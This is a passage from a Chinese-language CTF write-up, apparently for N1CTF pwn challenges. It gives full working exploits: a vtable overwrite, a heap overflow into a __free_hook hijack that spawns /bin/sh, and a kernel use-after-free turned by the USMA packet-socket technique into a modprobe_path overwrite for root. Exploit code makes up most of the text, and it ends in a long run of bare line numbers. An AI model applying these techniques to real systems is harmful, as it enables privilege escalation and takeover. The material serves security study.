01:00080x4ed518 (__preinit_array_start+56) —▸ 0x4038b8 (BOFApp::~BOFApp()) ◂— sub rsp, 18h
02:00100x4ed520 (__preinit_array_start+64) —▸ 0x403552 (BOFApp::launch()) ◂— sub rsp, 88h

核心思路就是覆盖虚表,使其执行后门函数

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './a.out'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b* 0x403909\n")
#gdb.attach(p,"b *$rebase()\n")
pause()

def cmd(op):
sla(">",str(op))

#debug()

vtable_addr = 0x4F4AA0
backdoor = 0x403387

vtable = p64(vtable_addr)
vtable += p64(backdoor)
vtable = vtable.ljust(0x40,b'\x00')

sa("canary",vtable)
sla("pwn :)",b'a'*0x68+p64(0x403407)+p64(vtable_addr))

p.interactive()

n1array

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=bf9f13ff31aa3f4c4036ab8bf12e14f3abe0d287, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序分析

程序维护了一个 hashTable,每个条目都是一个 Chunk 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
00000000 Chunk struc ; (sizeof=0x40, mappedto_21)
00000000 nelts dd ?
00000004 field_4 dd ?
00000008 atom dq ? ; offset
00000010 name_len dd ?
00000014 field_14 dd ?
00000018 name dq ? ; offset
00000020 value2 dd ?
00000024 value_nelts dd ?
00000028 value dq ? ; offset
00000030 type_nelts dd ?
00000034 field_34 dd ?
00000038 type_key dq ? ; offset
00000040 Chunk ends

其中记录了三种 Atom(name,type,value):

  • name:用于索引 hashTable
  • value:有两种模式
1
2
3
4
5
6
7
8
9
10
if ( a2->key )
{
chunk->value2 = a2->value2; /* 使用value2(整个数组的数据为同一个值) */
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > a2->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&a2->value; /* 使用value数组(分别指定数组数据的每一个值) */
}

通过逆向分析,得出三种 Atom 的输入格式如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def value_atom(nelts, value:list, key=0, value2=0):
# len | type | key | value2 | nelts | value
value_data = b"".join([p32(i) for i in value])
tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def type_atom(nelts, type:list):
# len | type | nelts | type
type_data = b"".join([p8(t) for t in type])
tmp = p32(2) + p32(nelts) + type_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def name_atom(name:bytes):
# len | type | name_len | name
tmp = p32(3) + p32(len(name)) + name
tmp = p32(4 + len(tmp)) + tmp
return tmp

漏洞分析

该题目的漏洞点比较隐秘,其核心在于 chunk->nelts 可能被重复写入:

1
2
3
4
5
6
7
8
9
10
11
chunk->value_nelts = type->nelts;
if ( type->key )
{
chunk->value2 = type->value2;
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > type->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&type->value;
}

当我们先写入一次 chunk->value,再写入更长的 chunk->value2 时就会触发这个漏洞,此时 chunk->nelts 会覆盖为 chunk->value2 的长度,但程序大部分功能仍然优先使用 chunk->value

1
2
3
4
5
6
7
8
9
10
11
if ( a1->value )
{
for ( i = 0; a1->nelts > i; ++i )
printVal(a1->value[i], a1->type_key[i]);
}
else
{
value2 = a1->value2;
for ( j = 0; a1->nelts > j; ++j )
printVal(value2, a1->type_key[j]);
}

这就导致了堆溢出

入侵思路

先利用堆溢出泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

最后劫持 tcache 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x18DD)\n")
#pause()

def value_atom(nelts, value:list, key=0, value2=0):
# len | type | key | value2 | nelts | value
value_data = b"".join([p32(i) for i in value])
tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def type_atom(nelts, type:list):
# len | type | nelts | type
type_data = b"".join([p8(t) for t in type])
tmp = p32(2) + p32(nelts) + type_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def name_atom(name:bytes):
# len | type | name_len | name
tmp = p32(3) + p32(len(name)) + name
tmp = p32(4 + len(tmp)) + tmp
return tmp

def cmd(op):
sla("cmd>>",str(op))

def hash(data:bytes):
# data_len | 0 | data
cmd(0)
ru("atom>>")
p.send(p32(len(data)+8))
p.send(p32(0)+data)

def dele(name):
cmd(2)
sla("name>>",name)

def show(name):
cmd(1)
sla("name>>",name)

def edit(name,index,data):
cmd(3)
sla("name>>",name)
sla("Input Index: ",str(index))
sla("Input New Val: ",str(data))

#debug()

payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base+libc.sym["__free_hook"]
system = libc_base+libc.sym["system"]
binsh = libc_base+next(libc.search(b"/bin/sh"))
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

payload = type_atom(0x100, [0]*0x100) + name_atom(b"1\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"3\x00") + value_atom(1, [0x1000]*1)
hash(payload)

dele(b"1\x00")
dele(b"2\x00")
dele(b"3\x00")

data = (free_hook >> 8) & 0xffffffff
edit(b"1111\x00",0x100-2,data)
data = (free_hook >> 40) & 0xffffffff
edit(b"1111\x00",0x100-1,data)
data = (free_hook & 0xff) * 0x1000000
edit(b"1111\x00",0x100-3,data)

payload = type_atom(0x100, [0]*0x100) + name_atom(b"a"*0x10+b";/bin/sh\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(p64(system)) + value_atom(1, [0x1000]*1)
hash(payload)

dele(b"a"*0x10+b";/bin/sh\x00")

p.interactive()

n1sub

1
2
~ $ cat /proc/version 
Linux version 6.1.58 (chuj@pwn-host.nixos) (gcc (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #1 SMP PREEMPT_DYNAMIC Mon Oct 16 12:23:54 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
qemu-system-x86_64 \
-m 512M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-append 'console=ttyS0 kaslr quiet loglevel=3 oops=panic panic=-1' \
-netdev user,id=net \
-device e1000,netdev=net \
-no-reboot \
-monitor /dev/null \
-cpu qemu64,+smep,+smap \
-smp cores=2,threads=1 \
-nographic -s
  • smep,smap,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs none /tmp
mount -t devtmpfs none /dev
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
insmod /sub.ko
chmod 666 /dev/n1sub
setsid /bin/cttyhack setuidgid 1000 /bin/sh #normal user
umount /proc
umount /sys
poweroff -d 0 -f

题目给了配置文件,有些内核保护并没有开启:

1
2
3
4
# CONFIG_MEMCG is not set /* 关闭内存控制器(GFP_KERNEL和GFP_ACCOUNT之间没有隔离) */
# CONFIG_SLAB_FREELIST_RANDOM is not set /* 关闭slab freelist随机化 */
# CONFIG_SLAB_FREELIST_HARDENED is not set
# CONFIG_SLUB_STATS is not set

漏洞分析

UAF 漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
if ( cmd == 0xDEADBEE1 )                      // dele
{
if ( arg > 2 )
goto LABEL_4;
if ( !bufs_free[arg] )
{
kfree(bufs[arg]);
bufs_free[arg] = 1;
}
raw_spin_unlock(&ioctl_lock);
return 0;
}

USMA 用户态映射攻击

在 Linux 内核中的 packet socket 模块可以让用户在设备驱动层接受和发送 raw packets,并且为了加速数据报文的拷贝,它允许用户创建一块与内核态共享的环形缓冲区:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • pg_vec 实际上是一个保存着连续物理页的虚拟地址的数组,而这些虚拟地址会被 packet_mmap 函数所使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page); /* 将内存页插入到用户态的虚拟地址空间中 */
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}
  • packet_mmap 将这些内核虚拟地址代表的物理页映射进用户态,这样普通用户就能在用户态对这些物理页直接进行读写
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int vm_insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page)
{
if (addr < vma->vm_start || addr >= vma->vm_end)
return -EFAULT;
if (!page_count(page))
return -EINVAL;
if (!(vma->vm_flags & VM_MIXEDMAP)) {
BUG_ON(mmap_read_trylock(vma->vm_mm));
BUG_ON(vma->vm_flags & VM_PFNMAP);
vma->vm_flags |= VM_MIXEDMAP;
}
return insert_page(vma, addr, page, vma->vm_page_prot);
}
EXPORT_SYMBOL(vm_insert_page);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static int insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page, pgprot_t prot)
{
struct mm_struct *mm = vma->vm_mm;
int retval;
pte_t *pte;
spinlock_t *ptl;

retval = validate_page_before_insert(page);
if (retval)
goto out;
retval = -ENOMEM;
pte = get_locked_pte(mm, addr, &ptl);
if (!pte)
goto out;
retval = insert_page_into_pte_locked(mm, pte, addr, page, prot);
pte_unmap_unlock(pte, ptl);
out:
return retval;
}
1
2
3
4
5
6
7
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}
  • 检查 page 是否为匿名页,是否为 Slab 子系统分配的页,以及 page 是否含有 type
  • 内存页的 type 总共有以下几种:
1
2
3
4
5
#define PG_buddy	0x00000080	/* 伙伴系统中的页 */
#define PG_offline 0x00000100 /* 为内存交换出去的页 */
#define PG_kmemcg 0x00000200 /* 为kmemcg使用 */
#define PG_table 0x00000400 /* 作为页表的页 */
#define PG_guard 0x00000800 /* 作为内存屏障的页 */

通过如下函数快速的创建一个 AF_PACKET 协议的原始套接字:

1
socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); /* AF_PACKET是原始套接字协议,是一种特殊的套接字协议,可以是数据链路层原始套接字 */
1
2
int version = TPACKET_V3;
setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)); /* 设置当前AF_PACKET套接字协议版本为TPACKET_V3 */
1
2
3
4
5
6
7
8
9
10
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_block_size = block_size;
req3.tp_block_nr = block_nr;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = frame_nr;
req3.tp_retire_blk_tov = retire_blk_tov;
req3.tp_sizeof_priv = 0;
req3.tp_feature_req_word = 0;
setsockopt(recv_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3)); /* 创建ring buffer(pg_vec) */

入侵思路

有 UAF 漏洞,但是 size 是随机的:

1
2
size = (unsigned int)get_random_u32() % 0x7B0 + 0x68;
sub_offset = ((unsigned int)get_random_u32() % (size - 0x50) + 0x50) & 0xFFFFFFF8;
  • size = [0x68, 0x818]
  • sub_offset = [0x50, sub_size]

此时需要使用 USMA(用户态映射攻击)

具体思路就是先申请一个 chunk 并读取 sub_size,释放后根据 sub_size 的大小来创建一个与之匹配的 ring buffer(pg_vec),由于程序没有开 slab freelist 随机化,因此这个 UAF 大概率会命中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   save_status();
bind_core(0);
unshare_setup();
fd = open("/dev/n1sub", O_RDWR);
if (fd < 0)
err_exit("open /dev/n1sub");

int socket_list[0x100];
for (int i = 0; i < 0x80; i++)
socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

sub_size = add();
printf("sub_size: 0x%x\n",sub_size);
printf("sub_offset: 0x%x\n",sub_offset);
int block_nr = sub_size / 0x8;
dele(0);

int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

内核模块会以 sub_offset 为偏移来修改 ring buffer(pg_vec) 中的数据(连续物理页的虚拟地址),导致程序映射到非预期的内存空间

  • 当程序执行 mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0) 进行映射时,函数 packet_mmap 会将 ring buffer(pg_vec) 中的各个物理页映射给用户态程序(表现为一个大内存块)
  • 另外 validate_page_before_insert 函数会进行检查,这导致通常情况下可以用于泄露的物理页没法成功映射(PG_buddy 表示该物理页可以被分配给其他进程使用,而 slab 分配的页面都带有 PG_buddy 标记)

之后我们可以通过 sub_offset 来定位非预期物理页的位置,进而打印出非预期的数据

这里的内存扫描有点困难,需要一个可以用于泄露或者劫持程序流程的物理页:

  • 用于泄露的内存页:先关闭内核地址随机化,再打印指针即可
  • 劫持程序的内存页:尝试覆盖指针,看看是否会引发段错误

这里我参考了网上 wp 的方法:先断点到 kfree(bufs[arg]),尝试查找 bufs 所在的内存页

1
2
3
4
5
6
7
8
pwndbg> search -t qword 0xffff888004e12000
Searching for value: b'\x00 \xe1\x04\x80\x88\xff\xff'
<pt> 0xffff888004844358 0xffff888004e12000
<pt> 0xffff888004cc3370 0xffff888004e12000 /* target */
<pt> 0xffff888004d5ad98 0xffff888004e12000
<pt> 0xffff888004e12570 0xffff888004e12000
<pt> 0xffffc90000217d98 0xffff888004e12000
<pt> 0xffffffffc0002370 0xffff888004e12000 /* target */
  • 打印 0xffffffffc0002370 所在内存页
1
2
3
4
5
6
7
pwndbg> telescope 0xffffffffc0002000
00:00000xffffffffc0002000 ◂— 0x0
01:00080xffffffffc0002008 —▸ 0xffffffff8293d8c0 ◂— 0xffffffffc0002008
02:00100xffffffffc0002010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:00180xffffffffc0002018 ◂— 0x627573 /* 'sub' */
04:00200xffffffffc0002020 ◂— 0x0
... ↓ 3 skipped
1
2
3
4
5
6
7
pwndbg> telescope 0xffff888004cc3000
00:00000xffff888004cc3000 ◂— 0x0
01:00080xffff888004cc3008 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
02:00100xffff888004cc3010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:00180xffff888004cc3018 ◂— 0x627573 /* 'sub' */
04:00200xffff888004cc3020 ◂— 0x0
... ↓ 3 skipped
  • 此时我们可以发现 0xffff888004cc30000xffffffffc0002000 都映射了内核模块的 bss 段

对于 0xffffffffc0002000 我们是控制不了的,但程序不知道是什么原因也在 0xffff888004cc3000 映射了一遍 bss 段,这就导致了我们可以直接控制 bss 段上的地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
uint64_t *unexpected_page;
int index;
while (1)
{
for (uint64_t i = 0; i < PAGE_SIZE; i++)
edit(0);

char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
if ((uint64_t)page == -1)
continue;

print_hex(page, 0x100);
unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
if (unexpected_page[0x3] == 0x0000000000627573){
puts("find target");
break;
}

munmap(page, PAGE_SIZE * block_nr);
if (index++ > 0x200){
err_exit("UAF error");
}
}

控制 bss 段上的地址,配合内核模块实现的功能就可以任意写(只能减少)

接下来最简单的提权方法就是修改 modprobe_path(将 /sbin/modprobe 修改为 /tmp//modprobe

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

#include "kernelpwn.h"
#define PAGE_SIZE 0x1000

int fd;
struct argg {
size_t data;
};

uint32_t sub_size, sub_offset;

int add(){
return ioctl(fd, 0xDEADBEE0, &sub_offset);
}

int dele(int index){
return ioctl(fd, 0xDEADBEE1, index);
}

int edit(int index){
return ioctl(fd, 0xDEADBEE2, index);
}

int main(int argc, char** argv, char** envp){
save_status();
bind_core(0);
unshare_setup();
fd = open("/dev/n1sub", O_RDWR);
if (fd < 0)
err_exit("open /dev/n1sub");

int socket_list[0x100];
for (int i = 0; i < 0x80; i++)
socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

sub_size = add();
printf("sub_size: 0x%x\n",sub_size);
printf("sub_offset: 0x%x\n",sub_offset);
int block_nr = sub_size / 0x8;
dele(0);

int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

uint64_t *unexpected_page;
int index;
while (1)
{
for (uint64_t i = 0; i < PAGE_SIZE; i++)
edit(0);

char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
if ((uint64_t)page == -1)
continue;

print_hex(page, 0x100);
unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
if (unexpected_page[0x3] == 0x0000000000627573){
puts("find target");
break;
}

munmap(page, PAGE_SIZE * block_nr);
if (index++ > 0x200){
err_exit("UAF error");
}
}

uint64_t kernel_base = unexpected_page[0xF] - 0x1851720;
uint64_t modprobe_path = kernel_base + 0x1852420;

printf("kernel_base: 0x%lx\n", kernel_base);
printf("modprobe_path: 0x%lx\n", modprobe_path);

uint32_t difference[] = {0, 0xFF, 0xF4, 0xF8, 0x3E};
for (int i = 1; i <= 0x5; i++){
unexpected_page[0x6E] = modprobe_path - sub_offset + i;

for (uint32_t j = 0; j < difference[i]; j++)
edit(0);
}

system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
system("echo '#!/bin/sh\nchmod 777 /flag' > /tmp/modprobe");
system("chmod +x /tmp/modprobe");
system("chmod +x /tmp/dummy");

system("/tmp/dummy");
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
